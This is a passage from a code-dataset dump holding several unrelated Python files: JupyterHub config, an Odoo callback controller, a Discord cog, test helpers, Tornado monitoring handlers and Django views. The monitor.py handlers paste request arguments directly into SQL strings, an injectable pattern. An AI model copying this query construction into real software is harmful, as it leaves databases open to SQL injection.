setup_code)\n if update:\n self.code_d_ = clean_code_d\n self.replacements[\"setup\"] = setup_code\n return setup_code, clean_code_d\n\n def remove_backslash(self, update=True):\n \"\"\"Remove backslash at the end of the line.\"\"\"\n # TODO(NikZak) for \\ inside \"\"\" or inside a comment, redo with tokenizer\n clean_code_d = {}\n for index, cell in self.code_d_.items():\n if cell:\n cell_source = re.sub(r\"\\\\\\n\\s*\", \" \", cell)\n clean_code_d[index] = cell_source\n if update:\n self.code_d_ = clean_code_d\n return clean_code_d\n\n def carve_imports(self, update=True):\n \"\"\"Get imports code.\"\"\"\n # assemble import code\n import_tokens = []\n clean_code_d_ = {}\n for cell_index, cell in self.code_d_.items():\n if \"ignore\" in self.control_params_d[cell_index]:\n continue\n\n # find imports\n tokens = [(x[0], x[1]) for x in _tokenize(cell)]\n logger.debug(\"Tokens: %s\", tokens)\n tokens_clean = []\n start_import_line = None\n\n for index, token in enumerate(tokens):\n if start_import_line is not None:\n if token[0] == NEWLINE:\n import_tokens += tokens[start_import_line:index] + [(NEWLINE, '\\n')]\n logger.debug(\"Added imports: %s\",\n tokens[start_import_line:index] + [(NEWLINE, '\\n')])\n start_import_line = None\n continue\n else:\n if token[0] == NAME and (token[1] == \"import\" or token[1] == \"from\"):\n start_import_line = index\n logger.debug(\"Started import line: %d\", start_import_line)\n else:\n tokens_clean.append(token)\n clean_code_d_[cell_index] = untokenize(tokens_clean)\n\n # 
add imports with no indentation\n    import_code = untokenize(import_tokens)\n    logger.debug(\"import_code: %s\", import_code)\n\n    # remove duplicates\n    import_code_l = import_code.split(\"\\n\")\n    import_code_l = list(dict.fromkeys(import_code_l))\n    import_code = \"\\n\".join(import_code_l)\n\n    logger.debug(\"imports code: %s\", import_code)\n\n    if update:\n      self.code_d_ = clean_code_d_\n      self.replacements[\"imports\"] = import_code\n    return import_code, clean_code_d_\n\n  def run(self):\n    \"\"\"Run in correct order.\"\"\"\n    self.remove_backslash()\n    self.carve_magic()\n    self.carve_control_params()\n    self.carve_imports()\n    self.carve_setup()\n    self.make_tests()\n\n  def apply_callbacks(self, output_string, callbacks):\n    \"\"\"Apply callbacks.\"\"\"\n    for callback in callbacks:\n      if callback not in [x[0] for x in self.accepted[\"callbacks\"]]:\n        logger.error(\"Unknown callback %s\", callback)\n        continue\n      if callback == \"isort\":\n        import isort  # pylint: disable=import-outside-toplevel\n        output_string = isort.code(output_string)  # pylint: disable=import-outside-toplevel\n      if callback == \"black\":\n        from black import format_str, FileMode  # pylint: disable=import-outside-toplevel\n        output_string = format_str(output_string, mode=FileMode())\n      if callback == \"yapf\":\n        from yapf.yapflib.yapf_api import FormatCode  # pylint: disable=import-outside-toplevel\n        from yapf.yapflib import file_resources  # pylint: disable=import-outside-toplevel\n        style_config = file_resources.GetDefaultStyleForDir(os.getcwd())\n\n        output_string = FormatCode(output_string, style_config=style_config)\n        # yapf<0.3 returns diff as str, >=0.3 returns a tuple of (diff, changed)\n        output_string = output_string[0] if isinstance(output_string,\n                                                       tuple) else output_string\n    return output_string\n\n  def check_cells(self, index_iter):\n    \"\"\"Check that the cell code respects control params.\"\"\"\n    if \"ignore\" in self.control_params_d[index_iter]:\n      return False\n    ops = [x[0] for x in _tokenize(self.code_d_[index_iter])]\n    if OP not in ops and NAME not in ops:\n      # code should do at least something meaningful\n      return False\n    return True\n\n  def check_cells_if(self, index_iter, control_line=None):\n    \"\"\"Check that the cell code respects control params.\"\"\"\n    if control_line is None:\n      control_line = []\n    for check in control_line:\n      check_l = check.split(\" \")\n      if check_l[0] == \"not\" and len(check_l) > 1:\n        check = \" \".join(check_l[1:])\n        if check not in self.accepted[\"params\"]:\n          logger.error(\"Unknown param: %s in template.py. Ignoring\", check)\n        if check in self.control_params_d[index_iter]:\n          return False\n      else:\n        if check not in self.control_params_d[index_iter]:\n          return False\n    return True\n\n  def check_head_if(self, control_line=None):\n    \"\"\"Check that the cell code respects control params.\"\"\"\n    if control_line is None:\n      control_line = []\n    for check in control_line:\n      check_l = check.split(\" \")\n      if check_l[0] == \"not\" and len(check_l) > 1:\n        check = \" \".join(check_l[1:])\n        if check in self.control_params_d[\"head_level\"]:\n          return False\n      else:\n        if check not in self.control_params_d[\"head_level\"]:\n          return False\n    return True\n\n  def make_tests_iter(self, templ_, output_string, cell_index=None):\n    \"\"\"Walk iteratively through the template.\"\"\"\n    for _, code_piece in sorted(templ_.items()):\n      if \"control\" in code_piece:\n        if \"if_head_level\" in code_piece[\"control\"]:\n          if not self.check_head_if(code_piece[\"control\"][\"if_head_level\"]):\n            continue\n        if \"if_cell_level\" in code_piece[\"control\"]:\n          if cell_index and not self.check_cells_if(\n              cell_index, code_piece[\"control\"][\"if_cell_level\"]):\n            continue\n        if \"loop\" in code_piece[\"control\"]:\n          templ_piece = code_piece[\"source\"]\n          for index_iter, value_iter in self.__dict__[code_piece[\"control\"]\n                                                      [\"loop\"]].items():\n            self.replacements[\"index_iter\"] = index_iter\n            self.replacements[\"index_iter_name\"] = str(index_iter).zfill(5)\n            self.replacements[\"value_iter\"] = value_iter\n            if \"comment\" in self.control_params_d[index_iter]:\n\n              self.replacements[\"comment\"] = self.control_params_d[index_iter][\n                \"comment\"].replace('\"', '\\\\\"')\n            self.replacements[\n              \"ct_saved_cell_outputs_stdout\"] = self.ct_saved_cell_outputs[\n                index_iter][\"stdout\"]\n            self.replacements[\n              \"ct_saved_cell_outputs_stderr\"] = self.ct_saved_cell_outputs[\n                index_iter][\"stderr\"]\n            self.replacements[\n              \"ct_saved_cell_outputs_display_data\"] = self.ct_saved_cell_outputs[\n                index_iter][\"display_data\"]\n            self.replacements[\"run_all_till_now\"] = (\n                self.replacements[\"setup\"] +\n                \"\".join(value for key, value in self.code_d_.items()\n                        if key < index_iter))\n\n            if not self.check_cells(index_iter):\n              continue\n            output_string = self.make_tests_iter(\n                templ_piece, output_string, cell_index=index_iter)\n          continue\n\n        code_formatted = code_piece[\"source\"]\n\n        if \"replacements\" in code_piece:\n          replacements = [\n              self.replacements[x] for x in code_piece[\"replacements\"]\n          ]\n          code_formatted = code_formatted.format(*replacements)\n\n        if \"callbacks\" in code_piece:\n          for callback in code_piece[\"callbacks\"]:\n            if callback == \"replace_asserts\":\n              code_formatted = replace_asserts(code_formatted)\n            if callback == \"save_outputs\":\n              code_formatted = save_outputs(code_formatted)\n\n        if \"indent\" in code_piece:\n          code_formatted = indent(code_formatted, count=code_piece[\"indent\"])\n\n        output_string = glue(output_string, code_formatted)\n\n    return output_string\n\n  def make_tests(self, update=True, callbacks=None, insert_saved_outputs=None):\n    \"\"\"Assemble test file.\"\"\"\n    if callbacks is None:\n      callbacks = self.kwargs[\"callbacks\"]\n    if insert_saved_outputs is None:\n      insert_saved_outputs = self.kwargs[\"insert_saved_outputs\"]\n    output_string = \"\"\n    output_string = self.make_tests_iter(self.templ, output_string)\n\n    if callbacks:\n      output_string = self.apply_callbacks(output_string, callbacks)\n\n    logger.debug(output_string)\n\n    # Writing to file\n    if update:\n      with open(self.output, \"w\") as file1:\n        
file1.write(output_string)\n return output_string\n","sub_path":"src/celltest/cells.py","file_name":"cells.py","file_ext":"py","file_size_in_byte":15117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"160602515","text":"# dummy for testing. Don't use this in production!\n#c.JupyterHub.authenticator_class = 'dummyauthenticator.DummyAuthenticator'\n\n# launch with docker\nc.JupyterHub.spawner_class = 'dockerspawner.DockerSpawner'\n\n# we need the hub to listen on all ips when it is in a container\nc.JupyterHub.hub_ip = '0.0.0.0'\n# the hostname/ip that should be used to connect to the hub\n# this is usually the hub container's name\nc.JupyterHub.hub_connect_ip = 'jupyterhub_basic'\n\n# pick a docker image. This should have the same version of jupyterhub\n# in it as our Hub.\nc.DockerSpawner.image = 'phaustin/notebook:step1'\nnotebook_dir = \"/home/jovyan/work\"\nc.DockerSpawner.notebook_dir = notebook_dir\n\n# tell the user containers to connect to our docker network\nc.DockerSpawner.network_name = 'net_basic'\nc.DockerSpawner.volumes = {\"jupyterhub-user-{username}\": notebook_dir}\n# delete containers when the stop\nc.DockerSpawner.remove = True\n\n# Github OAuth\nfrom oauthenticator.github import GitHubOAuthenticator\nc.JupyterHub.authenticator_class = GitHubOAuthenticator\nc.GitHubOAuthenticator.allowed_organizations = ['eoas-ubc-github-shared-test']\n\n# Load users from access list\nimport os\n\nc.Authenticator.whitelist = whitelist = set()\nc.Authenticator.admin_users = admin = set()\n\njoin = os.path.join\nhere = os.path.dirname(__file__)\nwith open(join(here, 'userlist')) as f:\n for line in f:\n if not line:\n continue\n parts = line.split()\n name = parts[0]\n whitelist.add(name)\n if len(parts) > 1 and parts[1] == 'admin':\n admin.add(name)\n\n","sub_path":"examples/github-oauth-users-limit/hub_image/jupyterhub_config.py","file_name":"jupyterhub_config.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"165255210","text":"# -*- coding: utf-8 -*-\r\n\r\nimport json\r\nimport logging\r\nimport xml.etree.cElementTree as ET\r\nimport sys\r\nfrom odoo.addons.wecom_api.api.wecom_msg_crtpt import WecomMsgCrypt\r\nfrom odoo import http, models, fields, _\r\nfrom odoo.http import request\r\n\r\n\r\nclass StripeController(http.Controller):\r\n \"\"\"\r\n \"\"\"\r\n\r\n @http.route(\r\n [\"/wecom_callback\", \"/wecom_callback/\"],\r\n type=\"http\",\r\n auth=\"public\",\r\n methods=[\"GET\", \"POST\"],\r\n )\r\n def WecomCallbackService(self):\r\n \"\"\"\r\n 企业微信回调服务\r\n \"\"\"\r\n\r\n @http.route(\r\n [\"/wecom_callback//\", \"/wecom_callback/contacts\"],\r\n type=\"http\",\r\n auth=\"public\",\r\n methods=[\"GET\", \"POST\"],\r\n )\r\n def WecomCallbackService(self, service, id, **kw):\r\n \"\"\"\r\n 企业微信回调服务\r\n :param id: 公司id\r\n :param service:回调服务名称 code \r\n \"\"\"\r\n company_id = request.env[\"res.company\"].sudo().search([(\"id\", \"=\", id)])\r\n corpid = company_id.corpid\r\n\r\n if request.httprequest.method == \"GET\":\r\n app = (\r\n request.env[\"wecom.apps\"]\r\n .sudo()\r\n .search([(\"company_id\", \"=\", id), (\"code\", \"=\", service)])\r\n )\r\n\r\n wxcpt = WecomMsgCrypt(app.callback_url_token, app.callback_aeskey, corpid)\r\n\r\n msg_signature = kw[\"msg_signature\"]\r\n timestamp = kw[\"timestamp\"]\r\n nonce = kw[\"nonce\"]\r\n echostr = kw[\"echostr\"]\r\n\r\n ret, sEchoStr = wxcpt.VerifyURL(msg_signature, 
timestamp, nonce, echostr)\r\n if ret != 0:\r\n # print(\"ERR: VerifyURL ret: \" + str(ret))\r\n logging.error(\"ERR: VerifyURL ret: \" + str(ret))\r\n sys.exit(1)\r\n return sEchoStr\r\n\r\n if request.httprequest.method == \"POST\":\r\n pass\r\n","sub_path":"wecom_api/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"510579153","text":"# import discord\nfrom discord.ext import commands\n\nfrom bot import BotBase, Context\n\n\nclass Moderation(commands.Cog):\n\n def __init__(self, bot: BotBase):\n self.bot = bot\n\n @commands.command(name='cleanup')\n @commands.check_any(commands.has_guild_permissions(manage_messages=True), commands.is_owner())\n async def cleanup(self, ctx: Context, limit: int = 50):\n \"\"\"Deletes messages related to bot commands from the channel.\n\n `limit`: the number of messages to process, can be a maximum of 100 messages.\n \"\"\"\n to_delete = []\n\n if not 0 < limit <= 100:\n raise commands.BadArgument('You can only delete between 1 and 100 messages.')\n\n async for message in ctx.channel.history(limit=limit):\n\n context = await self.bot.get_context(message)\n if message.author == self.bot.user:\n to_delete.append(message)\n\n if ctx.me.permissions_in(ctx.channel).manage_messages and context.command is not None:\n to_delete.append(message)\n\n await ctx.send(f'Deleted {len(to_delete)} messages', delete_after=5)\n\n if ctx.me.permissions_in(ctx.channel).manage_messages:\n await ctx.channel.delete_messages(to_delete)\n else:\n for message in to_delete:\n await message.delete(silent=True)\n\n\ndef setup(bot: BotBase):\n bot.add_cog(Moderation(bot))\n","sub_path":"cogs/moderation.py","file_name":"moderation.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"327790531","text":"# ***** BEGIN LICENSE BLOCK *****\n# \n# Copyright © 2005-2013, NIF File Format Library and Tools contributors.\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# \n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# \n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# \n# * Neither the name of the NIF File Format Library and Tools\n# project nor the names of its contributors may be used to endorse\n# or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# ***** END LICENSE BLOCK *****\n\nimport nose\n\nfrom pyffi.utils.withref import ref\nfrom pyffi.formats.nif import NifFormat\n\ndef n_attach_specular_prop(n_trishapedata):\n '''Attaches a NiSpecularProperty to a trishapedata block property's array at pos[0]'''\n \n n_nispecularprop = NifFormat.NiSpecularProperty()\n n_nispecularprop.flags = 0x1\n \n # add property to top of list\n n_trishapedata.properties.reverse()\n\n n_trishapedata.num_properties += 1\n n_trishapedata.properties.update_size()\n n_trishapedata.properties[-1] = n_nispecularprop\n\n n_trishapedata.properties.reverse()\n \ndef n_alter_material_specular(n_nimaterialprop):\n with ref(n_nimaterialprop.specular_color) as n_color3:\n n_color3.r = 0.5\n n_color3.g = 0.0\n n_color3.b = 0.0\n \ndef n_check_material_specular(n_mat_prop):\n nose.tools.assert_equal((n_mat_prop.specular_color.r,\n n_mat_prop.specular_color.g,\n n_mat_prop.specular_color.b),\n (0.5,0.0,0.0))\n \ndef n_check_specular_block(n_mat_prop):\n nose.tools.assert_is_instance(n_mat_prop, NifFormat.NiSpecularProperty)\n\ndef n_check_specular_property(n_specular_prop):\n nose.tools.assert_equal(n_specular_prop.flags, 0x1)\n","sub_path":"testframework/integration/property/specular/n_gen_specular.py","file_name":"n_gen_specular.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"476590963","text":"#!coding=utf-8\r\nfrom mvc import *\r\nfrom utility import ActionHandler\r\nfrom bson import ObjectId\r\nfrom mvc import mongo_util\r\nfrom mvc import mysql_util\r\nimport hashlib\r\nfrom logic import manage\r\nfrom logic.define import *\r\n\r\n\r\n@url(r\"/monitor\")\r\nclass MonitorHandler(ActionHandler):\r\n def get(self):\r\n substid = self.get_argument('substid')\r\n subst = manage.get_subst_info(substid = substid)\r\n self.render(\"monitor.html\", substid = substid, subst = subst)\r\n\r\n@url(r\"/monitor/ERC\")\r\nclass MonitorERCHandler(ActionHandler):\r\n def get(self):\r\n substid = self.get_argument('substid')\r\n subst = manage.get_subst_info(substid = substid)\r\n eu = manage.get_eu_info(substid)\r\n\r\n jqr_event = []\r\n for e in eu:\r\n euaddr = e.get('euaddr')\r\n fields = ['ERC_ID', 'euaddr', 'HappenTime', 'Note', 'Content']\r\n sql = \"select {} from JQR_EVENT_ERC where euaddr='{}' and DealWith=0 order by HappenTime DESC\".format(','.join(fields), euaddr)\r\n data, t = mysql_util.m_query(sql, fields, findall=True)\r\n if not data:\r\n data = [{'ERC_ID': 1, 'euaddr': '0000000100000001', 'HappenTime': 'HappenTime', 'Note': 'Note', 'Content': 'Content'},\r\n {'ERC_ID': 2, 'euaddr': '0000000100000001', 'HappenTime': 'HappenTime', 'Note': 'Note', 'Content': 'Content'}]\r\n\r\n for d in data:\r\n d['name'] = e.get('name')\r\n d['HappenTime'] = str(d.get('HappenTime'))\r\n\r\n jqr_event.extend(data)\r\n\r\n fields = ['ERC_ID', 'PointID', 'HappenTime', 'Note', 'Content']\r\n sql = \"select {} from YW_EVENT_ERC where substid='{}' and 
DealWith=0 order by HappenTime DESC\".format(','.join(fields), substid)\r\n yw_event, t = mysql_util.m_query(sql, fields, findall=True)\r\n\r\n if not yw_event:\r\n yw_event = [{'PointID':'1', 'HappenTime': '2', 'Note': '5', 'Content':'4'}]\r\n\r\n self.write(dict(status = True, jqr_event = jqr_event, yw_event = yw_event))\r\n\r\n\r\nindex = 0\r\ndef get_index():\r\n global index;\r\n if index == 11:\r\n index = 1\r\n else:\r\n index += 1\r\n\r\n return index\r\n\r\n@url(r\"/monitor/eu\")\r\nclass MonitorTermHandler(ActionHandler):\r\n def get(self):\r\n road = self.get_argument('road', None)\r\n substid = self.get_argument('substid')\r\n subst = manage.get_subst_info(substid = substid)\r\n m, mapinfo = manage.get_map_info_by_substid(substid)\r\n eu = manage.get_eu_info(substid)\r\n\r\n data = []\r\n for e in eu:\r\n euaddr = e.get('euaddr')\r\n fields = ['EuAddr', 'CollectTime', 'SchemeNum', 'PlanNum', 'MeasuNum', 'JqrTime', 'BatteryCapat', 'BatteryVar', 'JqrConMode', 'LocalTemp', 'LocalHum', 'LocalWind', 'SysTemp', 'JqrSpeed', 'CurrentPoint', 'CurrentPointLog', 'FrontPoint', 'FrontPointLog']\r\n\r\n sql = \"select {} from TermRealTimeShowData where euaddr='{}'\".format(','.join(fields), euaddr)\r\n d, t = mysql_util.m_query(sql, fields, findall=True)\r\n for _d in d:\r\n if road:\r\n _d['CurrentPoint'] = get_index()\r\n _d['name'] = e.get('name')\r\n data.extend(d)\r\n\r\n self.write(dict(status = True, data = data, mapinfo = mapinfo))\r\n\r\n\r\n@url(r\"/monitor/ERC/history\")\r\nclass MonitorERCHistoryHandler(ActionHandler):\r\n def get(self):\r\n substid = self.get_argument('substid')\r\n subst = manage.get_subst_info(substid = substid)\r\n eu = manage.get_eu_info(substid)\r\n\r\n EVENT = []\r\n for e in eu:\r\n euaddr = e.get('euaddr')\r\n euaddr = '1' * 24\r\n fields = ['euaddr', 'HappenTime', 'Note', 'Content', 'DealWith']\r\n sql = \"select {} from JQR_EVENT_ERC where euaddr='{}' order by HappenTime DESC\".format(','.join(fields), euaddr)\r\n data, t = mysql_util.m_query(sql, fields, findall=True)\r\n\r\n for d in data:\r\n d['name'] = e.get('name')\r\n\r\n EVENT.extend(data)\r\n\r\n fields = ['pointid', 'HappenTime', 'Note', 'Content']\r\n sql = \"select {} from YW_EVENT_ERC where substid='{}' and DealWith=0 order by HappenTime DESC\".format(','.join(fields), substid)\r\n data, t = mysql_util.m_query(sql, fields, findall=True)\r\n\r\n EVENT.extend(data)\r\n\r\n self.render(\"erc_history.html\", data = EVENT)\r\n\r\n@url(r\"/monitor/ERC/dealwith\")\r\nclass MonitorERCDealWithHandler(ActionHandler):\r\n def post(self):\r\n ERC_ID = self.get_argument('ERC_ID')\r\n flag = self.get_argument('flag')\r\n\r\n if flag == 'JQR':\r\n sql = \"update JQR_EVENT_ERC set DealWith=1 where ERC_ID={}\".format(ERC_ID)\r\n mysql_util.m_execute(sql)\r\n else:\r\n sql = \"update YW_EVENT_ERC set DealWith=1 where ERC_ID={}\".format(ERC_ID)\r\n mysql_util.m_execute(sql)\r\n\r\n\r\n self.write(dict(status = True))\r\n\r\n","sub_path":"action/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"258325763","text":"#!/usr/bin/env python2\n# OpenPOWER Automated Test Project\n#\n# Contributors Listed Below - COPYRIGHT 2018\n# [+] International Business Machines Corp.\n#\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# 
http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied. See the License for the specific language governing\n# permissions and limitations under the License.\n#\n\n\nimport unittest\nimport os\n\nimport OpTestConfiguration\nfrom common.OpTestSystem import OpSystemState\n\n\nclass RunHostTest(unittest.TestCase):\n def setUp(self):\n self.conf = OpTestConfiguration.conf\n self.system = self.conf.system()\n self.host_cmd = self.conf.args.host_cmd\n self.host_cmd_file = self.conf.args.host_cmd_file\n self.host_cmd_timeout = self.conf.args.host_cmd_timeout\n if not (self.host_cmd or self.host_cmd_file):\n self.fail(\"Provide either --host-cmd and --host-cmd-file option\")\n\n def runTest(self):\n self.system.goto_state(OpSystemState.OS)\n con = self.system.sys_get_ipmi_console()\n self.system.host_console_login()\n self.system.host_console_unique_prompt()\n if self.host_cmd:\n con.run_command(self.host_cmd, timeout=self.host_cmd_timeout)\n if self.host_cmd_file:\n if not os.path.isfile(self.host_cmd_file):\n self.fail(\"Provide valid host cmd file path\")\n fd = open(self.host_cmd_file, \"r\")\n for line in fd.readlines():\n line = line.strip()\n if \"reboot\" in line:\n self.system.goto_state(OpSystemState.OFF)\n self.system.goto_state(OpSystemState.OS)\n con = self.system.sys_get_ipmi_console()\n self.system.host_console_login()\n self.system.host_console_unique_prompt()\n continue\n con.run_command(line, timeout=self.host_cmd_timeout)\n","sub_path":"testcases/RunHostTest.py","file_name":"RunHostTest.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"61495680","text":"import sys, crowdlib as cl, crowdlib_settings\n\nhit_type = cl.create_hit_type(title=\"Find the answer to a trivia question.\",\n\treward=0.10, description=\"Search online for the answer to a question.\")\n\ncmd = sys.argv[1]\n\nif cmd==\"post\":\n\thit = hit_type.create_hit(\"http://alexquinn.org/amt/zipper.html\", 400)\n\thit_type.preview_in_browser()\n\nelif cmd==\"fetch\":\n\tfor asg in hit_type.assignments:\n\t\tprint( \" Submitted %s by %s on %s\"%(asg.submit_time, asg.worker.id,\n\t\t\t\t\t\t\t\t\t\t\t\t\tasg.hit.hit_type.title) )\n\t\tfor answer in asg.answers:\n\t\t\tprint( \" %s : %s\"%(answer.question_id, answer.text) )\n\nelif cmd==\"cancel\":\n\thit_type.is_available = False\n","sub_path":"examples/minimal_external.py","file_name":"minimal_external.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"290711150","text":"#### Create your views here. 
####\nfrom django.shortcuts import render,redirect,render_to_response\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom misitio.ai.forms import CuidadoresForm\nfrom misitio.ai.forms import ApoderadosForm\nfrom misitio.ai.forms import PacientesForm\nfrom misitio.ai.forms import ParamForm\nfrom misitio.ai.forms import PautaForm\nfrom misitio.ai.forms import ResupautaForm\nfrom misitio.ai.forms import DetapautaForm\nfrom misitio.ai.forms import AnticiposForm\nfrom misitio.ai.forms import Pauta_auxForm\nfrom misitio.ai.forms import Pacientes_auxForm\nfrom misitio.ai.forms import RecetaForm,MaefarmForm\n\nfrom misitio.ai.models import Cuidadores,Pacientes,Apoderados,Detapauta\nfrom misitio.ai.models import Param,Pauta,Resupauta\nfrom misitio.ai.models import Anticipos,Pauta_aux,Pagocui_aux\nfrom misitio.ai.models import Pacientes_aux \nfrom misitio.ai.models import Mensual_aux \nfrom misitio.ai.models import Diario_aux,Saldos,Receta,Maefarm\nfrom misitio.ai.misfunciones import anticipos,preparadia,boleta,saldoant,fecha_actual \nfrom misitio.ai.misfunciones import nombrearch,fecha_palabra,nturnos,grabasaldo\nfrom misitio.ai.misfunciones import edad,fecha_ddmmaaaa\n\nfrom django.shortcuts import get_list_or_404, get_object_or_404\n\nfrom django.views.generic import TemplateView\nfrom django.db.models import Q\nfrom django.contrib import messages,auth\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nimport os, sys,shutil\nfrom os import remove\nfrom os import scandir, getcwd,startfile\nfrom datetime import datetime,timedelta,date\nfrom django.db import DatabaseError, transaction\nfrom django.db import connection\nimport calendar\n\nimport openpyxl\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Alignment,Border,Font,PatternFill,Side\nfrom openpyxl.styles import colors\nfrom openpyxl.styles import Font, Color,Fill\nfrom openpyxl.styles.borders import BORDER_THIN\nfrom openpyxl.drawing.image import Image as XLIMG\n\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import Image\n\nfrom reportlab.lib import colors\nfrom reportlab.lib.colors import blue,white,black\nfrom reportlab.lib.units import inch, mm \nfrom reportlab.platypus import Paragraph \nfrom reportlab.lib.styles import ParagraphStyle \nfrom reportlab.lib.enums import TA_CENTER \nfrom reportlab.platypus.tables import TableStyle, Table\nfrom reportlab.platypus.doctemplate import SimpleDocTemplate\nfrom reportlab.platypus import Paragraph, Spacer\nfrom reportlab.lib import styles\nfrom io import BytesIO\nfrom reportlab.lib.enums import TA_JUSTIFY\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.pdfbase.ttfonts import TTFont\n\nfrom tabulate import tabulate\n\nimport wget\nfrom PIL import Image\nfrom django.http import FileResponse, Http404\nimport getpass\nfrom getpass import getuser\nfrom misitio.ai.forms import UploadFileForm\n\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom reportlab.platypus.flowables import Flowable\nfrom reportlab.lib.styles import getSampleStyleSheet\nimport csv,io\n#\n# para prueba\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.views.generic.edit import CreateView\n\n\n@login_required(login_url='log_out')\ndef principal(request):\n variable1 = 'PAGINA PRINCIPAL'\n logo = 
\"/static/img/Logo_AsistenciaIntegral.jpg\"\n #logo = \"/staticfiles/img/Logo_AsistenciaIntegral.jpg\" # for PythonAnyWhere\n context ={\"variable1\":variable1,\"logo_corp\":logo, }\n return render(request,'principal.html',context)\n\ndef login_ini2(request):\n return HttpResponse(\"!! Sistema momentaneamente en etapa de pruebas y avance de desarrollo!!\")\n\ndef login_ini(request):\n\tvariable1 = 'Pantalla de Acceso al Sistema'\n\terror_log = 'ok'\n\tusername = request.POST.get('username')\n\tpassword = request.POST.get('password') # valor del template\n\tuser = auth.authenticate(username=username, password=password)\n\tif request.method == \"POST\":\n\t\tif user is not None and user.is_active:\n\t\t\t# Correct password, and the user is marked \"active\"\n\t\t\tauth.login(request, user)\n\t\t\trequest.session['username_x'] = username # variable gobal\n\t\t\trequest.session['id_x'] = user.id \t# variable gobal\n\t\t\t#return HttpResponse(str(user.id))\n\t\t\treturn HttpResponseRedirect(\"principal\")\n\n\t\terror_log = \"error\"\n\t\t\n\tcontext ={\"variable1\":variable1,\"error_log\":error_log,}\n\treturn render(request,\"login_ini.html\",context)\n\tcontext ={\n\t\t\t'user':user,\n\t\t\t\"variable1\":variable1,\n\t\t\t\"error_log\":error_log,\n\t}\n\treturn render(request,'login_ini.html',context)\n\n\ndef log_out(request):\n\timport socket\t# ip de la maquina\n\tid_x = request.session.get('id_x')\t# nombre de la maquina\n\tip = socket.gethostname()\n\tequipo_ip = socket.gethostbyname(ip)\n\tequipo_remoto = equipo_ip+\" \"+ip\n\tlog_out_x = datetime.now()\n\tcursor = connection.cursor()\n\tcursor.execute(\n\t\t\"update auth_user set log_out=%s,equipo_remoto=%s where id=%s\",[log_out_x,equipo_remoto,id_x] # \n\t)\n\tlogout(request)\n\treturn redirect('login_ini')\n\n\ndef grid_cuidadores(request):\n\tvariable1 = 'Despliegue de Cuidadores'\n\tcuidador = Cuidadores.objects.all().exclude(rut='0-0').order_by('nombre')\n\tcuenta = cuidador.count()\n\tcontext = {\n\t\t\"cuidadores\":cuidador,\n\t\t\"variable1\":variable1,\n\t\t\"cuenta\":cuenta,}\n\treturn render(request,'grid_cuidadores.html',context)\n\n\ndef grid_apoderados(request):\n\tvariable1 = 'Despliegue de Apoderados e Instituciones'\n\tapoderado = Apoderados.objects.all().order_by('nombre')\n\tcontext = {\n\t\t\"apoderados\":apoderado,\n\t\t\"variable1\":variable1,\n\t}\n\treturn render(request,'grid_apoderados.html',context)\n\n\n@login_required(login_url='login_ini')\ndef grid_pacientes(request):\n\tvariable1 = 'Despliegue de Pacientes'\n\tlogo_pdf = \"/static/img/logopdf.png\"\n\tpaciente = Pacientes.objects.all().order_by('nombre')\n\tcuenta = paciente.count()\n\tfalso_x = False # paciente HABILITADO - DESHABILITADO 